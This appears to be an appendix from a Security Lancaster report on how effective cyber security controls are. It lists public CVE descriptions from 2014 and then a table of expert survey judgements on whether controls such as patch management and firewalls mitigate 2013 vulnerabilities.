CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 25 of 28
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Cyber Controls Applicability

| CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE |
|---|---|---|---|---|---|---|---|
| CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware |
| CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management |
| CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management |
| CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration |
| CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management |
| CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management |
| CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management |
| CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall |
| CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser) |
| CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy) |
| CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall |
| CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware |
| CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser) |
| CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install) |
| CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall |
| CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware |
| CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management |
| CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management |
| CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
